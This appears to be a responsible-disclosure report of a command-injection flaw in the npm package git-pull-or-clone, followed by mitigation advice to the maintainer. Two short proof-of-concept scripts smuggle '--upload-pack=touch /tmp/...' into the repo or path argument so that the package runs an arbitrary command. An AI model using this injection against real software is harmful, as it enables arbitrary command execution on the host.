git-clone-or-pull
describes itself as a tool to ensure a git repo exists on disk and that it's up-to-date.
Resources:
- Project's GitHub source code: https://github.com/feross/git-pull-or-clone
- Project's npm package: https://npmjs.org/package/git-pull-or-clone
I'm reporting a Command Injection vulnerability in git-clone-or-pull
npm package.
A use of the --upload-pack
feature of git is also supported for git clone
, and allows users to execute arbitrary commands on the OS.
The source includes the use of the secure child process API spawn()
(see here: https://github.com/feross/git-pull-or-clone/blob/master/index.js#L28-L33) however the outpath
parameter passed to it may be a command line argument to the git clone
command and result in arbitrary command injection.
If users are in control either of the url (url
) to clone, or the directory path (outPath
) to clone it to then the vulnerability applies.
Install git-clone-or-pull@2.0.1
, which is the latest.
POC 1:
const gitPullOrClone = require('git-pull-or-clone')
const repo = 'file:///tmp/zero12345'
const path = '--upload-pack=touch /tmp/pwn3'
gitPullOrClone(repo, path, (err) => {
if (err) throw err
console.log('SUCCESS!')
})
Observe a new file created: /tmp/pwn3
POC 2:
const gitPullOrClone = require('git-pull-or-clone')
const repo = '--upload-pack=touch /tmp/pwn4'
const path = 'file:///tmp/zero12345'
gitPullOrClone(repo, path, (err) => {
if (err) throw err
console.log('SUCCESS!')
})
Observe a new file created: /tmp/pwn4
Liran Tal
Hi buddy! Thanks for replying promptly on this. I'm happy to help on this and will suggest the following strategies to mitigate the issue:
--
) notation, for example:git clone -- <repo> <directory>
, in which case even if a user controls the value, it won't be treated as an argument togit clone
.git@
or withhttps://
as an example. You can also harden the input by checking that it indeed exists on disk before you pass that input togit clone
.I haven't prepared a fix in advance and being almost 11pm here it's not something I could establish prompt but will do my best to clear our some of the schedules between tomorrow and Thursday to send you a patch.
p.s. it seems like I have accidentally disclosed another module that is vulnerable to this and the team has been reaching out to them too so I appreciate it if you indeed don't share anything about that. I updated this gist to remove that mention. Thanks!